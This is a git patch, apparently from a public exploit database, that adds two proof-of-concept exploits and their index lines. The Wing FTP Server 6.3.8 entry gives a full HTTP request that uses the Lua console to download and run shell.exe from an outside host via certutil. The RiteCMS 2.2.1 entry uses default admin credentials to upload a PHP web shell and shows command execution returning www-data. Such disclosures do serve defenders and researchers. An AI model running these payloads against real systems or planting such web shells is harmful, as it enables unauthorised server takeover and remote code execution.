From da1d7301afa92fac408daca87741e1580b8f0f38 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 17 Jul 2020 05:02:11 +0000 Subject: [PATCH] DB: 2020-07-17 2 changes to exploits/shellcodes RiteCMS 2.2.1 - Remote Code Execution Wing FTP Server 6.3.8 - Remote Code Execution (Authenticated) --- exploits/lua/webapps/48676.txt | 27 +++++++++++++++++++++++ exploits/php/webapps/48675.txt | 40 ++++++++++++++++++++++++++++++++++ files_exploits.csv | 2 ++ 3 files changed, 69 insertions(+) create mode 100644 exploits/lua/webapps/48676.txt create mode 100644 exploits/php/webapps/48675.txt diff --git a/exploits/lua/webapps/48676.txt b/exploits/lua/webapps/48676.txt new file mode 100644 index 000000000..1ef32dc71 --- /dev/null +++ b/exploits/lua/webapps/48676.txt @@ -0,0 +1,27 @@ +# Exploit Title: Wing FTP Server 6.3.8 - Remote Code Execution (Authenticated) +# Date: 2020-06-26 +# Exploit Author: v1n1v131r4 +# Vendor Homepage: https://www.wftpserver.com/ +# Software Link: https://www.wftpserver.com/download.htm +# Version: 6.3.8 +# Tested on: Windows 10 +# CVE : -- + +Wing FTP Server have a web console based on Lua language. For authenticated users, this console can be exploited to obtaining a reverse shell. + +1) Generate your payload (e.g. msfvenom) +2) Send and execute via POST + +POST /admin_lua_.html?r=0.3592753444724336 HTTP/1.1 +Host: 192.168.56.105:5466 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://192.168.56.105:5466/admin_lua_term.html +Content-Type: text/plain;charset=UTF-8 +Content-Length: 153 +Connection: close +Cookie: admin_lang=english; admin_login_name=admin; UIDADMIN=75e5058fb61a81e427ae86f55794f1f5 + +command=os.execute('cmd.exe%20%2Fc%20certutil.exe%20-urlcache%20-split%20-f%20http%3A%2F%2F192.168.56.103%2Fshell.exe%20c%3A%5Cshell.exe%20%26shell.exe') \ No newline at end of file diff --git a/exploits/php/webapps/48675.txt b/exploits/php/webapps/48675.txt new file mode 100644 index 000000000..e2329a0a2 --- /dev/null +++ b/exploits/php/webapps/48675.txt @@ -0,0 +1,40 @@ +# Exploit Title: RiteCMS 2.2.1 - Remote Code Execution +# Date: 2020-07-03 +# Exploit Author: Enes Özeser +# Vendor Homepage: http://ritecms.com/ +# Version: 2.2.1 +# Tested on: Linux + +1- Go to following url. >> http://(CHANGE-THIS)/ritecms/cms/ +2- Default username and password is admin:admin. +3- Go "Filemanager" and press "Upload file" button. +4- Choose your php webshell script and upload it. + +((Example PHP Web Shell Code)) +"; system($_GET['cmd']); ?> + +5- You can find uploaded file there. >> http://(CHANGE-THIS)/ritecms/media/(FILE-NAME).php +6- We can execute a command now. >> http://(CHANGE-THIS)/ritecms/media/(FILE-NAME).php?cmd=whoami + +(( REQUEST )) + +GET /ritecms/media/webshell.php?cmd=whoami HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://127.0.0.1/ritecms/cms/index.php?mode=filemanager&directory=media +Connection: close +Cookie: icms[device_type]=desktop; icms[guest_date_log]=1593777486; PHPSESSID=mhuunvasd12cveo52fll3u +Upgrade-Insecure-Requests: 1 + +(( RESPONSE )) + +HTTP/1.1 200 OK +Date: Fri, 03 Jul 2020 21:10:13 GMT +Server: Apache/2.4.43 (Debian) +Content-Length: 14 +Connection: close +Content-Type: text/html; charset=UTF-8 +
www-data
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 3650ffcef..6de805545 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -42922,3 +42922,5 @@ id,file,description,date,author,type,platform,port
 48672,exploits/php/webapps/48672.txt,"Web Based Online Hotel Booking System 0.1.0 - Authentication Bypass",2020-07-15,KeopssGroup0day_Inc,webapps,php,
 48673,exploits/php/webapps/48673.txt,"Online Farm Management System 0.1.0 - Persistent Cross-Site Scripting",2020-07-15,KeopssGroup0day_Inc,webapps,php,
 48674,exploits/php/webapps/48674.txt,"Infor Storefront B2B 1.0 - 'usr_name' SQL Injection",2020-07-15,ratboy,webapps,php,
+48675,exploits/php/webapps/48675.txt,"RiteCMS 2.2.1 - Remote Code Execution",2020-07-16,"Enes Özeser",webapps,php,
+48676,exploits/lua/webapps/48676.txt,"Wing FTP Server 6.3.8 - Remote Code Execution (Authenticated)",2020-07-16,V1n1v131r4,webapps,lua,